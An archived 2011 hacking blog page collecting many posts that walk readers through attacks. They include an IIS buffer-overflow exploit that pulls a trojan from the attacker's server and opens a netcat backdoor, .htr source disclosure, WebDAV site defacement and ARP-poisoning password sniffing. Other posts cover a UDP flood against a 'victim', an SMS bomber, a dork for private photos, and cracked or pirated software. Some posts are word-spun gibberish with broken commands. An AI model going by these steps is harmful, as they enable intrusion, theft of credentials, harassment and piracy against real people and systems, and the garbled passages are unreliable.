March 2011 | Learn Cyber Security

Learn How To Hack Web Servers

Hacking Tool: IISHack.exe

iishack.exe overflows a buffer used by IIS http daemon, allowing for arbitrary code to be executed.
c:\ iishack 80 is the IIS server you're hacking, 80 is the port its listening on, is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.
"IIS Hack" is a buffer overflow vulnerability exposed by the way IIS handles requests with .HTR extensions. A hacker sends a long URL that ends with ".HTR". IIS interprets it as a file type of HTR and invokes the ISM.DLL to handle the request. Since ISM.DLL is vulnerable to a buffer overflow, a carefully crafted string can be executed in the security context of IIS, which is privileged. For example, it is relatively simple to include in the exploit code a sequence of commands that will open a TCP/IP connection, download an executable and then execute it. This way, any malicious code can be executed.
A sample exploit can be constructed as shown below:
To hack the target site and attacker's system running a web server can use iishack.exe and ncx.exe.
To begin with, the ncx.exe is configured to run from the root directory. IIShack.exe is then run against the victim site.
c:\>iishack.exe  80 /ncx.exe 
The attacker can then use netcat to evoke the command shell
c:\>nc  80 
He can proceed to upload and execute any code of his choice and maintain a backdoor on the target site.

IPP Buffer Overflow Countermeasures

  • Install latest service pack from Microsoft.
  • Remove IPP printing from IIS Server
  • Install firewall and remove unused extensions
  • Implement aggressive network egress filtering
  • Use IISLockdown and URLScan utilities
  • Regularly scan your network for vulnerable servers
Without any further explanation, the first countermeasure is obviously to install the latest service packs and hotfixes.
As with many IIS vulnerabilities, the IPP exploit takes advantage of a bug in an ISAPI DLL that ships with IIS 5 and is configured by default to handle requests for certain file types. This particular ISAPI filter resides in C: \WINNT\System32\msw3prt.dll and provides Windows 2000 with support for the IPP. If this functionality is not required on the Web server, the application mapping for this DLL to .printer files can be removed (and optionally deleting the DLL itself) in order to prevent the buffer overflow from being exploited. This is possible because the DLL will not be loaded into the IIS process when it starts up. In fact, most security issues are centered on the ISAPI DLL mappings, making this one of the most important countermeasure to be adopted when securing IIS.
Another standard countermeasure that can be adopted here is to use a firewall and remove any extensions that are not required. Implementing aggressive network egress can help to a certain degree.
With IIS, using IISLockdown and URLScan - (free utilities from Microsoft) can ensure more protection and minimize damage in case the web server is affected.
Microsoft has also released a patch for the buffer overflow, but removing the ISAPI DLL is a more proactive solution in case there are additional vulnerabilities that are yet to be found with the code.

ISAPI DLL Source disclosures

  • Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be in accessible.
  • This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file.
  • appending this string causes the request to be handled by ISM.DLL, which then strips the '+.htr' string and may disclose part or all of the source of the .asp file specified in the request.
IIS supports several file types that require server-side processing. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. Vulnerability exists in ISM.DLL, the filter DLL that processes .HTR files. HTR files enable remote administration of user passwords.
HTR files are scripts that allow Windows NT password services to be provided via IIS web servers. Windows NT users can use .HTR scripts to change their own passwords, and administrators can use them to perform a wide array of password administration functions. HTR is a first-generation advanced scripting technology that is included in IIS 3.0, and still supported by later versions of IIS for backwards compatibility. However, HTR was never widely adopted, and was superceded by Active Server Pages (ASP) technology introduced in IIS 4.0.

Attack Methods
Exploit / Attack Methodology
By making a specially formed request to IIS, with the name of the file and then appending around 230 + " %20 " (these represents spaces) and then appending " .htr " this tricks IIS into thinking that the client is requesting a " .htr " file . The .htr file extension is mapped to the ISM.DLL ISAPI Application and IIS redirects all requests for .htr resources to this DLL.
ISM.DLL is then passed the name of the file to open and execute but before doing this ISM.DLL truncates the buffer sent to it chopping off the .htr and a few spaces and ends up opening the file whose source is sought. The contents are then returned. This attack can only be launched once though, unless the web service started and stopped. It will only work when ISM.DLL first loaded into memory.
"Undelimited .HTR Request" vulnerability: The first vulnerability is a denial of service vulnerability. All .HTR files accept certain parameters that are expected to be delimited in a particular way. This vulnerability exists because the search routine for the delimiter isn't properly bounded. Thus, if a malicious user provided a request without the expected delimiter, the ISAPI filter that processes it would search forever for the delimiter and never find it.
If a malicious user submitted a password change request that lacked an expected delimiter, ISM.DLL, the ISAPI extension that processes .HTR files, would search endlessly for it. This would prevent the server from servicing any more password change requests. In addition, the search would consume CPU time, so the overall response of the server might be slowed.
The second threat would be more difficult to exploit. A carefully-constructed file request could cause arbitrary code to execute on the server via a classic buffer overrun technique. Neither scenario could occur accidentally. This vulnerability does not involve the functionality of the password administration features of .HTR files.
".HTR File Fragment Reading" vulnerability: The ".HTR File Fragment Reading" vulnerability could allow fragments of certain types of files to be read by providing a malformed request that would cause the. HTR processing to be applied to them. This vulnerability could allow a malicious user to read certain types of files under some very restrictive circumstances by levying a bogus .HTR request. The ISAPI filter will attempt to interpret the requested file as an .HTR file, and this would have the effect of removing virtually everything but text from a selected file. That is, it would have the effect of stripping out the very information that is most likely to contain sensitive information in .asp and other server-side files.
The .htr vulnerability will allow data to be added, deleted or changed on the server, or allow any administrative control on the server to be usurped. Although .HTR files are used to allow web-based password administration, this vulnerability does not involve any weakness in password handling.
"Absent Directory Browser Argument" vulnerability: Among the default HTR scripts provided in IIS 3.0 (and preserved on upgrade to IIS 4.0 and IIS 5.0) were several that allowed web site administrators to view directories on the server. One of these scripts, if called without an expected argument, will enter an infinite loop that can consume all of the system's CPU availability, thereby preventing the server from responding to requests for service.

Read More Add your Comment 0 comments

Core Security Integrates CORE IMPACT Pro with Metasploit Project

Core Security Technologies, bourgeois of CORE Effect Pro, the most sweeping production for proactive endeavour security investigating, today declared that it has created a fully nourished discipline compounding between its flagship software set and the Metasploit open-source tap possibility.

With today's organizations using incursion testing to strategically trial their vulnerabilities and IT defenses, Ngo Instrument now offers both nonrecreational onslaught testers and operational protection staffers who use Modify Pro the cognition to tap direct into the open-source functionality of Metasploit to influence out vulnerability psychotherapy.

By providing the chance to use Metasploit in concert with Effect Pro, perception testers instrument now be healthy to apprize all the benefits of Core's commercial-grade, automated solution - with its monolithic repository of professionally industrial exploits, economical and easy-to-use program and in-depth reporting capabilities - alongside the advisable noted staring thing send.

Through the desegregation, testers faculty now be fit to:

1. Get a system compromised during investigating with Metasploit into the Touch environs and deploy an Touch Pro Functionary. The Official is a patented, syscall agent load that allows users to:

    * Displace Upshot Pro's ladened extent of automatic perception testing capabilities from the compromised scheme.
    * Leverage IMPACT's wide selection of commercial-grade exploits, plus denary pre- and post-exploitation capabilities for in-depth, omnibus attempt copy.
    * Marcher perception tests to different systems, mimicking an attacker's attempts at identifying and exploiting paths of imperfectness to backend systems and aggregation.

2. Use Combat Pro's automated Fast Incursion Run (RPT) to utilise vulnerabilities, then begin Metasploit's db-autopwn feature and afterwards upload the results affirm into Modify Pro. This allows users with fewer breeding and skillfulness to panorama Metasploit investigation accumulation within the IMPACT surround.

"We've long respected the acquisition of H.D. Thespian, his team and the district of Metasploit contributors in creating a sumptuous tap hypothesis that offers practised testers a reach of capabilities, and we loved to egest it easier for those who require to use Metasploit alongside Set Outcome Pro to do so," said Fred Pinkett, vice chairwoman of fluid direction at Nucleus Warrantee. "By message paid testers and warrantee body greater power to centralize their assessments and united their Metasploit efforts into their Event Pro deployments, we think that we're providing the market with an enlarged opportunity to communicate out Change Pro-Metasploit combining gift officially come in the close version of CORE Alter Pro, due to board from Nucleus Certificate in Apr 2010.

"As someone who utilizes both CORE Fight Pro and Metasploit, it's invaluable to see Nucleus flying towards integrating in this way," said Steve Shead, Administrator of IT & Info Warrantee Functionary and at "It faculty make testers many orbit for umbrella investigation and categorization, and another boulevard of affliction checking by mercantilism Metasploit experimentation results position into Event Pro. It's pleasing to see Ngo targeting their development efforts into providing automatic onset investigation capabilities that are as stretched and propulsive as humanly workable; ultimately this agency t

"The compounding the Metasploit structure with Change Pro module define a new era for vulnerability agreement," said Chris Nickerson, CEO of Lares Consulting. "Adult onrush testers and enterprises similar present now help from the exploits of Metasploit while existence competent to investing the right profession and reporting of Touch Pro. The most reliable mercenary means merging with the extravasation furnish research of the subject inspiration community will surely be a hit for all."

Read More Add your Comment 0 comments

{Linux} Tips and Tricks

Are you a unix geek ? Here are both indispensible linux tips and tricks which are staleness for new and knowledgeable users alike.Lets change a aspect at them-More Linux Tips and tricks for geeks and newbies alike

Hurrying up your alcoholic journeying

Get faster file dealings by using 32-bit transfers on your cruel force

Conscionable add the line:

    hdparm -c3 /dev/hdX

to a bootup script.If you use SuSE or remaining distros based on SYS V,


should manipulate for you. This enables 32-bit dealings on your marmorean ride. On whatever systems it can alter soul action by 75%. To trial your show vantage, write:

    hdparm -t -T /dev/hdX

Author DOS-like commands
More grouping are unwinding to Linux because they avoid the stability of gracious old DOS. In that wanton, more users are typewriting DOS commands (which originated from UNIX in the premiere abode) that lie smooth but make errors. The order "cd.." in DOS is dead binding, but Linux balks. This is because "cd" is a mastery, and any constant for that dictation staleness be unconnected from the code book application in your domicile directory to modify the file ".bashrc". The point is there on utility, this hides the line from inborn ls representation.

Add the lines:

    name cd/="cd /"
    a.k.a. cd~="cd ~"
    alias cd..="cd .."

And I usually add these...

    name md="mkdir"
    name rd="rmdir -i"
    a.k.a. rm="rm -i"

and my position and comfort lover a.k.a....

    a.k.a. ls="ls --color"

name is a compelling puppet, and can be victimised in the .bashrc book as surface as from the compel connection. You can, if you need to pass the reading, create your own group of bomb commands to agree how you run. As longitudinal as you put them in your .bashrc record, they'll be there everytime you log in. Notation that if you oft log in as structure, you power require to simulate /home/username/.bashrc to /root/.bashrc to remain yourself lucid.

Scene your timezone
The timezone under Linux is set by a symbolic statement from /etc/localtime[1] to a enter in the /usr/share/zoneinfo[2] directory that corresponds with what timezone you are in. For model, since I'm in Southeast Australia, /etc/localtime is a symlink to /usr/share/zoneinfo/Australia/South. To set this join, type:

    ln -sf ../usr/share/zoneinfo/your/zone /etc/localtime

Pose your/zone with something suchlike Australia/NSW or Australia/Perth. Screw a lie in the directories under /usr/share/zoneinfo to see what timezones are purchasable.

   1. This assumes that /usr/share/zoneinfo is linked to /etc/localtime as it is low Red Hat Unix.
   2. On senior systems, you'll effort that /usr/lib/zoneinfo is utilised instead of /usr/share/zoneinfo. See also the ulterior writing ``The period in both applications is wicked''.

How to do approving with tar ?
You can mantain a position of files that you with to voice into a enter and tar it when you greet.

    tar czvf tarfile.tar.gz -T list_file

where list_file is a acerate name of what you poverty to allow into the tar


    /etc/ppp (all files into the /etc/ppp directory)

How to protect a computer from responsive to sound ?

a panduriform "sound 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all" instrument do the fob... to grow it back on, only

    "ring 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all"

Check adjusted for statesman tips and tricks.


Read More Add your Comment 0 comments

Use SSH Tunneling to surf net invisibly

Unable to surf net over work/college ? Want to surf net invisibly ? Well,we have a solution for that,SSH Tunneling.An SSH tunnel is an encrypted tunnel created through an SSH protocol connection. SSH tunnels may be used to tunnel unencrypted traffic over a network through an encrypted channel.In easy language,you can surf net without being monitored and even surf blocked sites too.SSH Is pretty awesome.
Without leaving your seat,you have a way to control a computer which ay be located anywhere on this planet.SSH TunnelingAnd if you have access to a PC with an SSHd installed, you can channelize your traffic through that computer,which is particularly is useful in situations when -
  1. The site is normally inaccessible from your current location (School/Work)
  2. You do not want your connection monitored (You’re using a WiFi hotspot/You’re in a country that monitors/censors your internet usage)
In this tutorial,I will be using Firefox on Gentoo Linux , but it its applicable to all distributions of linux.
Step One: Setting Up the Tunnel
All common Linux distributions come with openssh packages. To check whether you have ssh installed already type the command "which ssh". Gentoo has opensh package preinstalled,so no tension :)
First we need to SSH to the server that we want to tunnel through, open up terminal and type the following command
ssh -ND @
Replace with a port number of your choice; This will be the LOCAL port which Firefox will use to tunnel the traffic later on…Try to choose a high and random port number so as nobody scans or sneaks them in (system admin and firewalls)
Practical Example:
ssh -ND 2945 [email protected]
Now enter your password as usual, and it will hang after authentication, which is perfectly normal as it isn’t an interactive session- Now minimize the terminal and open Firefox.
Step Two: Configuring Firefox
In Firefox, Go to (Depending upon which version you are using)
preferences -> advanced -> Network -> connection settings
Tools –> options –> Advanced –> Network –> settings
A new window should appear,select the “Manual Proxy Configuration” option, you’ll need to type some information in the ‘SOCKS Host’ section.
Host: localhost
Port: Port you used in the SSH command earlier.
Save your changes..Just to make sure it worked, check your IP with an online IP checker :)

Happy Surfing

Read More Add your Comment 3 comments

Beaver's SMS Bomber Pro

Features Include:
Full Feature List:
Custom SMTP Server (Make Sure You Type It Right)
Custom Carrier Gateway (If Your Victims Gateway Is Not In The Large List You May Find And Enter it Yourself)
Custom Number Of SMS To Send (Finally Have Where You Can Enter Any Amount To Send)
Save/Load Settings (Will Save Everything You Enter In The Fields, Restarting Your Computer Will Lose The Saved Settings)
Fixed XP GUI Issues
Stop Bombing At Any Time
Watch The Number Of SMS Sent In The Title Bar
No Longer Freezes While Sending
Added A Recent slave's Box Where You Can Select An Entry And Right-Click It To Bomb It Again Or Delete It From The List
Save/Load Recent Victims List

GMail Is The Default SMTP Server That Is Used Which Has A Limit On The Number That Can Be Sent
Has A Lot Of Carriers Already Pre-Entered For You.
SMS Looks Like

FRM: Senders Email
SUBJ: Subject
MSG: Message

What Is New In The Pro Version:
Error Handling, For Example If There Was An Error Sending The Message It Will Ask You If You Want To Change The E-mail/Password You Are Using. This Is Just One Of The Many Error Handling I Have Added.
[Image: 1XB4F.png]



Read More Add your Comment 4 comments

Hack about 80% of every website out there

All right,
You kids need to stop asking for someone else to hack your "friends" forum, your girlfriends myspace page, etc.

You want to learn to hack, stop asking stupid questions.

There is ONE tool, that was created originally to protect from hackers. Unfortunately, it's one of the best friends a hacker will ever have :

It's called Acunetix.

Acunetix is a tool that scans websites for known vulnerabilities. It will list all possible sql, xss, html injections, all java injections, all passwords and database weaknesses, all ftp weaknesses, etc. All form submissions exploits that the website can be targeted with. Remote upload and download vulnerabilities.

It will work in 80% of the cases, its database is updated regularly, but websites with latest updates and a good admin might not be targetable.

So here's the thing. Before you post anymore questions such as : "Can this website be hacked ?" or "How do I hack this forum ?", download Acunetix in the link below (I couldn't be bothered uploading a new one).

Acunetix Full Version HERE

(Uploaded by me, 100% clean)

Simply install it and copy the crack folder content into your Acunetix folder (replace files), and when you start the program, click on New Scan, follow the steps.

It will answer most of your questions. Take any known website, scan them and you'll find lots of little "medium risk" security problems etc. The program will explain what the potential harms are, not how to do them. The rest is up to you, do a bit of research, learn by yourself.

So use Acunetix, and stop asking stupid things that just make people think you have a pea for a brain.

Oh, and last tip : is your friend. Don't forget it before you ask anything else.
Adnan Anjum

Read More Add your Comment 4 comments

Darkjumper v5.8 Sqli,Lfi,Rfi,Rce scanner

Darkjumper v5.8 Sqli,Lfi,Rfi,Rce scanner

Darkjumper is a free tool what will try to find every website that hosts at the same server as your target. Then check for every vulnerability of each website that host at the same server.

Here are some key features of "Darkjumper":

· scan sql injection, rfi, lfi, blind sql injection
· autosql injector
· proxy support
· verbocity
· autoftp bruteforcer
· IP or Proxy checker and GeoIP


· Python

Download link:

Read More Add your Comment 0 comments

Bypass Websense or Cyberoam

Hello Friends, today i am going to explain you How to hack cyberoam websense and all other security firewalls that college, institutions, offices use to block websites at their respective places. Most of my users have asked me about that how to access blocked websites in their college and offices, i have explained this earlier also but those loopholes are now fixed and those methods to hack cyberoam and websense doesn't work effectively now and also hacking through proxy is quite tedious task as we have to search for working proxy websites which in itself is a very tedious task, and these doesn't work always. But the method that i will explain today is really awesome and doesn't require much task and thus its quite easy and the most important its 100% working. So friends read on for detailed hack....

For hacking Cyberoam or Websense you must know How cyberoam and websense works? If you know how they works then you can easily find flaws in that and hack it very easily.

Cyberoam is a 8 layer hardware firewall that offers stateful and deep packet inspection for network and web applications and user based identity security. Thus the firewall is quite secured. Now how we can hack that 8 layer security its the main important question here, as i have mentioned above that main working and blocking of any website or application by cyberoam is basically done at deep packet inspection step, now here the flaw in any security firewall lies, also in case of cyberoam and websense too. They block all websites by parsing their content and if their content contains the restricted keywords then they block that websites. They also use category blocking which also works on same concept. The flaw is with websites that uses SSL feature, the websites that contains SSL lock i.e. the websites that uses https are not blocked by them. They have to block these websites manually which is a very hectic task and believe me nobody blocks them.

So the proxy websites that uses https i.e. SSL proxies are also not blocked by these websites.

Only those proxies are blocked which are known or being heavily used. But the tool that i give you create SSL proxies by itself that means its proxies cannot be blocked. So friends this tool rocks.
Things that we need to hack cyberoam, websense and any such such hardware firewall:

1. TOR browser ( a anonymous web browser like Mozilla which has inbuilt proxy finder that bypasses the websites easily that are being blocked by cyberoam or websense).

2. A USB or pendrive ( where you will keep the portable version of TOR browser)

3. If USB drives are disabled we will use different drive for its installation. (also portable version of TOR can be executed from any place).
Steps to hack Cyberoam:

1. Download the TOR web browser.

To download TOR browser: CLICK HERE

2. Now install the TOR web browser. In case of portable version it will extract.

For Installation and usage Instructions visit here: CLICK HERE

3. Now open the TOR browser and start surfing your favorite website like facebook, orkut, gmail ..everything at you office....
4. That's all the hack. I hope you all have liked it.
For such hacks keep visiting...and subscribe our posts, if you don't wanna miss any such hack....
Adnan Anjum

Read More Add your Comment 2 comments

Use Google to get almost any software's serial no [Mr.MindfReak]

Use Google to get Serial No of any Software
Most of the people downloading trial and using it, only after the expiration of trial they try for crack, Serial No, Keygen, Patch....

But many don't known where to get Serial No, Some websites may be infect your system with Trojan horse, Viruses, Ad ware, Spy ware....

So for beginners this is a simply way to find hack with less effort and it saves time to, But make sure you have anti virus activated before trying to get some Serials, Patches to avoid data loss

Just follow the steps as instructed below

1) Go to Google
2) type this syntax in search bar " 94FBR"
3) Replace Product name with desired software and leave a space then type 94FBR
4) Press enter, thats it

Now you receive Many pages which contains Serial no, Crack, Patches....

Just make a try, this simple trick works for many peopl.

Demo: 94fbr office 2007
(Its will list the pages contains the keys for Office 2007)

Read More Add your Comment 1 comments

Google trick to find private pictures!

Maybe you are a "voyeur".

Maybe you need some pictures for your school work.

Of course you can go to a dedicated website where you can find lot of free pictures.

But you can also dig some private pictures directories.

Try this little code in Google, you may find lot of Non public pictures
intitle:index.of +"Indexed by Apache::Gallery"
search by adding a word at the end, for example:

intitle:index.of +"Indexed by Apache::Gallery" +paris
I just realise that maybe some of you guys use Apache Gallery for your own private pictures.

If you want to verify if your own private pictures ares indexed, just paste this code in Google.

site:www.YourSite intitle:index.of +"Indexed by Apache::Gallery"
(Replace YourSite by the server hosting your pictures (your URL.)

Read More Add your Comment 2 comments

IIS EXPLOIT [For Xp And Win7]

Steps for Xp-
# open run
# type-
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
and press enter !
#A new window name "WEB FOLDER" gets open
#Right click and click on New, Add Web Folder then enter your vulnerable website address.
#then next….finish
# now You can insert your page with name index.html by simply copy pasting.
Also after getting access to the website…Many websites don’t allows you to
add your page. so leave them.
#Dork- "Powered by IIS" or use your own unique dork.
Windows 7-
#Click Start.
#Click Computer.
# In the following dialog click Map Network Drive.
# On the Map Network Drive dialog, click "Connect to a Web site that you can use to store your documents and Pictures" this will pop up the "Welcome to the Add Network Location Wizard".
# Click on Next.
# Click on ”Choose a custom network location”.
# Click on Next.
# Now type the web folder address that you want to access.
# Enter a NAME to help you identify the web folder and click Next.
# Place a checkmark on ‘Open this network location when I click finish’.
# Click Finish.
and insert your deface page !!

Read More Add your Comment 0 comments

How To Sniff Passwords With Cain And Abel

Download Cain and Abel Here: Cain & Abel
Run Cain and Abel as administrator
Go to the tab that says sniffer
Go to the upper right corner under the Cain pciture and enable the sniffer
select your adapter (usually the one that has a listed Ip address)
Click of the blue Plus sign
Leave everything as is and press ok
Right click on each of ip addresses that come up
Resolve the host name for each one of them
Go to the bottom of the screen and hit the APR tab
Click on the top box
Click the blue plus sign
Hind the computer you want get passwords/information from in the left hand box
Highlight everything that comes up in the righthand box
Go to the upper right hand corner, by the sniffer and enable the APR poisener
To Find passwords, go to the bottem of the screen where it says passwords
Here you will find all usernames and passwords of the person you have poisened (Most of the passwords will be in HTTP)

If you didn't understand this look below:

[Image: cain1ql6.jpg]

[Image: cain2ix7.jpg]

[Image: cain3ki1.jpg]

[Image: cain4ff7.jpg]

[Image: cain5im8.jpg]

[Image: cain6zb1.jpg]

[Image: cain7hj2.jpg]

Read More Add your Comment 0 comments

How to use Net-Tools! Best Tool Ever!

The definition of Net Tools
Net Tools is cutting-edge security and network monitoring software for the Internet and Local Area Networks, providing clients with the ability and confidence to meet the challenges of tomorrow's technology. Keeping pace with the industry trends, we offer professional tools that support the latest standards, protocols, software, and hardware for both wired and wireless networks. The main goal is the creation of high quality software. Net Tools is a very strong combination of network scanning, security, file, system, and administrator tools useful in diagnosing networks and monitoring your PC and computer's network connections for system administrators. Next to the essential core tools it includes a lot of extra valuable features. It’s a Swiss Army knife for everyone interested in a set of powerful network tools for everyday use. This all-in-one toolkit includes also a lot of handy file and system utilities next to the huge amount of network tools. The menus are fully configurable, so in this way you won’t get lost in the extremely large amount of essential tools. All the additional features will make this application a must have for all system administrators. There are numerous constructive and valuable applications included in Net Tools that can be used for a great amount of purposes. The latest version of Net Tools is hybrid; it means that it’s capable of working together with applications that are made and designed for Net Tools, so in this way more flexibility and user-friendliness is obtained. This software is designed for the Microsoft Windows OS (Windows 98, NT, 2000, 2003, XP, Vista). It’s entirely compatible and has thoroughly been tested on Windows XP. With the 175+ tools it is a great collection of useful tools for network users. The size of Net Tools 5.0.70 is approximately 25 Mb.

Some screenshots!

Some features of Net Tools

Net Tools 5.0 (build 70) contains a whole variety of network tools.

1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)

Many extra features and utilities are included in this package!

Now, Lets show you how to use some of my favorite tools!

The IP Sniffer!
Well, First of all you want to open Net-Tools.
Now click on Start<Exterior Tools<Internet Tools<Advanced Packet Sniffer.
Now a window should pop up, From there do you see the three tabs under "start logging?" Click on UDP.
Now, Open the chat window you are using to talk with someone, I believe it can be used with almost anything, [just make sure you dont have any background programs running] Once you have the chat open, Click on "Start Logging" And type to him, As soon as you do that, Click "Stop Logging". Now the IP that isn't yours should be the victims. If there is multiple IPs, Just look for the one that appears the most.

The UDP Flooder!
Go to Start<Network Tools and scroll down some till you see "UDP Flooder"
This tool can actually be used to DoS someone! A Actual computer!
The only down fall is that you must have a Dedicated Box, Which cost... eh somewhere around 80$ a month.
If you do have a Box, Just put Net Tools on the box.
Once you have Net Tools on your box, Enter the victims IP, Enter some random data such as [jklsahdakljsdh] and copy and paste it like TWO times. Put the speed to 10 and click start!
NOTICE** This cannot be used on your PC, Not strong enough! Must be used with a Dedicated Box.

Tutorial IRC Trojan!
Start<System Tools<Tut IRC Trojan.

Add bytes to a .exe!

Start<File Tools<Add Byes to .EXE
And MANY MANY more! There a hundreds of tools!

Download Here!


Read More Add your Comment 2 comments

Windows 7 ™ SP1 32&64 Genuine

[Mega] Windows 7 ™ SP1 32&64 Genuine [All Parts By -Mr.Mindfreak™]


This is the most complete release which includes all available verisons of Windows 7 (except "N" and "E" editions) : 



Service Pack 1
Microsoft released the first official service pack for Windows 7 on February 22, 2011. This is an important update that includes previously released security, performance, and stability updates for Windows 7. SP1 also includes new improvements to features and services in Windows 7, such as improved reliability when connecting to HDMI audio devices, printing using the XPS Viewer, and restoring previous folders in Windows Explorer after restarting.
Windows 7 Service Pack 1 is an update that does the following :

- Helps keep PCs supported.
- Provides ongoing improvement to the operating system, by including previous updates delivered over Windows Update as well as continuing incremental updates to the Windows 7 platform based on customer and partner feedback.
- Makes it easy for organizations to deploy a single set of updates.

How to install :

Extract using WinRAR.
- Use ImgBurn** to burn the extracted ISO file called "faXcooL.Windows.7.SP1.ENG.x86-x64.ACTiVATED"
* You can use any other software for this operation (Nero, Alcohol, CloneCD...)
* Burning speed should not be faster than 4x.
- Restart your computer*.
* You can install it from existing OS, but I'll recommend the clean installation.
- Make sure you've seleceted your DVD-ROM/RW drive as a first boot device (BIOS setup)*
* If you don't know how to do that, check this link
- The text message will appear "Press any key to boot from CD or DVD...."
* By pressing the key you're entering the setup.
- Select your language, time and currency and keyboard input (optionaly)
- Click "Install now".
- Choose your edition* (x86 is 32-bit, x64 is 64-bit) depending of CPU type you have.
* Note that if you have less than 4GB of RAM, x64 will be useless.
- Click "I accept".
- Click "Custom (advanced).
- Choose your partition/hdd drive where Win7 should be installed and click format.
* Setup will continue automaticly and it will finish after 15-30 min.
- Next step will be username (Image 17).
- Type your password (if you want).
- Choose the third option for next step.
- Select your time zone.
- Select your current location.
- And the last step will be silent auto-activation*
* Your PC will restart for the last time.

And that would be all about installation. You're in Win.


Part 1 : ""
Part 2 : ""
Part 3 : ""
Part 4 : ""
Part 5 : ""

Read More Add your Comment 5 comments

Hf & Fs & Fsc & Mu & Df Cookies Cheker program

this program is programed by me using c# language

it's function is to check (hotfile & fileserve & megaupload &filesonic &depositfiles )cookies either it is premium or not
his program is programed by me using c# language

it's function is to check (hotfile & fileserve & megaupload &filesonic &depositfiles )cookies either it is premium or not

[Image: 92043980.png]

[Image: 87555372.png]

note :
fileserve (short) :it is the "PHPSESSID"
